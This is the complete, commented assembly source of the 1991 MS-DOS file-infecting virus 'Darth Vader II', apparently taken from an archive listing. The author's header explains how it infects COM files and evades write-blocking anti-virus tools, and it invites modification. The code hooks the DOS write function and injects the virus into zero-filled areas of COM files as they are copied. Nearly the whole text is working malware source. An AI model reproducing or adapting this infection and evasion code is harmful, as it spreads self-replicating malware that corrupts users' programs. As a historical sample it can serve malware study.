home *** CD-ROM | disk | FTP | other *** search
- ;*******************************************************************************
- ;* *
- ;* D A R T H V A D E R ][ *
- ;* *
- ;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia *
- ;* All Rights Reserved *
- ;* *
- ;* This is the second release of Darth Vader virus. Now he infect only *
- ;* those COM file, wich have area of 345 (or more) zeros. Virus put *
- ;* himself in this area and make jump to its code. As before, he can't *
- ;* be stoped by ANTI4US or disk write utilities - DOS function 40h *
- ;* (WRITE to File/Device). The virus operate in memory only, so there is *
- ;* no slowing in operations. This release of virus support DOS versions *
- ;* from 2.X till 4.X. *
- ;* You may make any modifications in this source, BUT let me know *
- ;* what have you done (drop message at Virus eXchange BBS) *
- ;* Waleri Todorov *
- ;*******************************************************************************
-
-
- org 0 ; Virus start offset is 0
-
- call NextLine ; Call next instruction
- NextLine
- pop si ; and calculate its present location
- sub si,3
-
- mov [0f0h],si ; Save own location in PSP
- mov [0FEh],ax ; Save AX in PSP (Important for DOS
- ; external commands)
- xor ax,ax ; Make DS point in interrupts vectors
- mov ds,ax ;
- mov es,[2Bh*4+2] ; Load ES with DOS segment from int2B
- mov ax,9000h ; DS will point at 9000h
- mov ds,ax ; usualy there are zeros
- xor di,di ; ES:DI point first byte in DOS segment
-
- NextZero
- inc di ; Next byte
- cmp di,0F00h ; If more than F00 bytes checked
- ja ReturnControl ; then suppose no room and exit
- push di ; else save tested offset
- xor si,si ; DS:SI == 9000:0000 (zeros area)
- mov cx,offset LastByte ; Size of virus
- repe cmpsb ; Compare until equal
- pop di ; Restore tested area offset
- jcxz Found ; If tested area is fill with zeros->
- jmp short NextZero ; else check next
- Found ; <- Will install himself in this area
- mov si,cs:[0F0h] ; Get own start address (maybe diff.)
- mov cs:[0F2h],di ; Save offset in DOS segment
- push cs ; Set DS point to virus segment
- pop ds ;
- mov cx,offset LastByte ; Size of virus
- rep movsb ; Move itself in DOSSEG
- push es ; Set DS point to DOSSEG
- pop ds
-
- mov si,di ; From this offset (after virus)
- NextCall ; Will search DOS dispatcher
- inc si ; Next byte
- jz ReturnControl ; If segment overrun -> Return control
- push si ; Save tested area offset
- lodsw ; Load word from DS:SI
- xchg ax,bx ; and put readed value in BX
- lodsb ; Load byte from DS:SI
- cmp bx,0FF36h ; Check 'magic' bytes
- je CheclAl ; If first word match -> check last
- AgainCall
- pop si ; else restore offset
- jmp short NextCall ; and go search next byte
- CheclAl
- cmp al,16h ; Check last 'magic' byte
- jne AgainCall ; If not match go search next byte
-
- pop si ; Else restore founded offset
- push si ; and save it for further usage
- mov di,cs:[0F2h] ; Get virus offset
- mov [4],di ; and save it to DOSSEG
- add di,offset HandleCall ; DI now adjusted to
- movsw ; original dispatcher place
- movsw ; Original dispatcher go at ES:DI for
- movsb ; further calls from virus
- pop di ; Restore founded offset
- mov al,9Ah ; and put an absolute FAR CALL
- stosb
- mov ax,offset Handle ; Put offset of new dispatcher
- add ax,cs:[0F2h] ; adjust him for different offsets
- stosw ; and store offset in FAR CALL
- mov ax,es ; put DOSSEG either in FAR CALL
- stosw
-
- ; Since this moment virus is installed and operated in memory. If make a copy
- ; of a file with DOS copy or PCTools and if file have area of 345 (or more)
- ; zeros, the copy (not the original) will became infected. Copied file will
- ; operate correctly when you start him. The virus logic allow multiple copies
- ; of the virus in the memory so you may have file with several copies of virus
- ; (each memory copy put himself in file)
-
-
- ReturnControl ; Return control to main program
- push cs ; Set DS and ES to point at PSP
- push cs
- pop ds
- pop es
- mov di,100h ; Set ES:DI point start of file at PSP:100
- push di ; Put DI in stack for dummy return
- mov si,[0F0h] ; Get beginning of the virus
- add si,offset First3 ; and adjust for first 3 instr.
- movsw ; Move saved First instructions
- movsb ;
- mov ax,[0FEh] ; Restore saved AX (required by DOS
- ret ; external command. Return control
- ; via dummy RET
- Fail
- jmp Do ; Requested jump! Don't touch here!
-
- Handle
- mov cs:[0Ah],ds ; Save write buffer segment
- mov cs:[0Ch],dx ; Save write buffer offset
- mov cs:[0Eh],cx ; Save write buffer size
-
- push ax ; Save important registers
- push bx
- push cx
- push es
- push si
- push di
-
- cmp ah,40h ; If function is not 40 (WRITE)
- jne Fail ; then call DOS with no infection
-
- cmp cx,offset LastByte+10h ; Check if size of buffer
- jb Fail ; is big enough to hold all virus
-
- mov ax,1220h ; Get file handle internal table number
- int 2Fh ; Via int2F (undocumented)
- mov bl,es:[di] ; Load table number to BL
- mov ax,1216h ; Get handle table address in ES:DI
- int 2Fh ; Via int2F (undocumented)
- add di,28h ; ES:DI will point file extension
-
- push cs ; Set DS to point in virus
- pop ds
-
- mov si,offset Com ; SI point to COM string
- add si,[4] ; adjust for different offsets
- mov cx,3 ; Will compare 3 bytes
- repe cmpsb ; Compare until equal
- jne Do ; If not equal -> exit with no infect
-
- push ds ; ES point to virus (DOS) segment
- pop es
- mov ds,cs:[0Ah] ; DS point to write buffer segment
- mov si,cs:[0Ch] ; SI point to write buffer offset
- mov di,offset First3 ; DI point to save area for
- add di,cs:[4] ; first 3 instruction. Adjust fo offset
- movsw ; Save first 3 instruction from write buffer
- movsb ; to virus buffer
-
- mov ax,9000h ; ES wil point zeros at 9000
- mov es,ax
- mov cx,cs:[0Eh] ; Restore write buffer size
- SearchHole
- xor di,di ; ES:DI point to 9000:0000
- inc si ; SI point next byte from write buffer
- dec cx ; Decrease remaining bytes
- jz Do ; If test all buffer -> no infection
- push cx ; Save remain buffer size
- push si ; Save current buffer offset
- mov cx,offset LastByte ; Will check for virus size only
- repe cmpsb ; Check until equal
- pop si ; Restore tested area offset
- jcxz FoundHole ; If 345 zeros -> Go infect
- pop cx ; Else restore remain buffer size
- jmp short SearchHole ; And go check next byte
- FoundHole
- pop cx ; Restore remain buffer size
- push si ; Save DS:SI (point to zeros in write buffer)
- push ds ;
- mov es,cs:[0Ah] ; ES:DI point to beginning of buffer
- mov di,cs:[0Ch] ;
- mov al,0E9h ; Put a NEAR JMP in buffer
- stosb ;
- sub si,cs:[0Ch] ; Calculate argument for JMP
- sub si,3
- mov ax,si ; and store it in buffer
- stosw ;
-
- pop es ; ES:DI now will point to zeros
- pop di ; and the JMP address point here
- ; So virus will receive control first
- push cs ; DS:SI will point to virus code in memory
- pop ds
- mov si,cs:[4] ; Adjust for different offsets
- mov cx,offset LastByte ; Will move virus size only
- rep movsb ; Move virus in write buffer
-
- Do
- pop di ; Restore important registers
- pop si
- pop es
- pop cx
- pop bx
- pop ax
-
- mov dx,cs:[0Ch] ; Restore write buffer address
- mov ds,cs:[0Ah] ; to DS:DX
-
- HandleCall
- db 5 dup (0) ; Here come original DOS jump instr.
- ; Usualy it is CALL SS:[MemOffs]
- ; In original DOS jump instr. is placed
- ; a FAR CALL to new WRITE handler
- retf ; Return to DOS
-
- First3 ; Here come first 3 instruction of infected file
- int 20h ; Now they are dummy terminate
- nop
- Com
- db 'COM' ; String to check for any COM file
-
- db 'Darth Vader' ; Virus signature
-
- LastByte ; Dummy label to compute virus size
- nop
- �
